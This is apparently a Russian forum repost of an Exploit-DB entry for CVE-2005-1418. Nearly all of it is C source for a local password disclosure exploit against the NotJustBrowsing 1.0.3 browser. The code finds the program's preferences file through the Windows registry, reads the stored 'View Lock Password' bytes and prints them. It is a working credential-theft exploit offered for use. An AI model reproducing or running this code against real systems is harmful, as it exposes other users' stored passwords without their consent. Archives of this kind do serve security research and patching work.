- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 966
- Проверка EDB
-
- Пройдено
- Автор
- KOZAN
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2005-1418
- Дата публикации
- 2005-04-28
C:
/*****************************************************************
NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan
Application: NotJustBrowsing 1.0.3
Procuder: www.notjustbrowsing.com
Vulnerable Description: NotJustBrowsing 1.0.3 discloses passwords
to local users.
Discovered & Coded by Kozan
Credits to ATmaCA
www.netmagister.com - www.spyinstructors.com
[email protected]
*****************************************************************/
#include <stdio.h>
#include <windows.h>
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
char *bilgi_oku(int adres,int uzunluk)
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey
) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,(LPBYTE) prgfiles,
&dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
return NULL;
}
RegCloseKey(hKey);
strcat(prgfiles,"\\NetLeaf Limited\\NotJustBrowsing\\notjustbrowsing.prf");
int i;
FILE *fp;
char ch[100];
if((fp=fopen(prgfiles,"rb")) == NULL)
{
return "NOTINSTALLED";
}
fseek(fp,adres,0);
for(i=0;i<uzunluk;i++)
ch[i]=getc(fp);
ch[i]=NULL;
fclose(fp);
return ch;
}
}
int main()
{
printf("NotJustBrowsing 1.0.3 Local Password Disclosure Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com\n");
printf("[email protected]\n\n");
if(bilgi_oku(4,3)==NULL)
{
printf("An error occured!\n");
return -1;
}
if(bilgi_oku(4,3)=="NOTINSTALLED")
{
printf("NotJustBrowsing 1.0.3 is not installed on your system!\n");
return -1;
}
printf("View Lock Password: %s",bilgi_oku(4,3));
return 0;
}
// milw0rm.com [2005-04-28]- Источник
- www.exploit-db.com
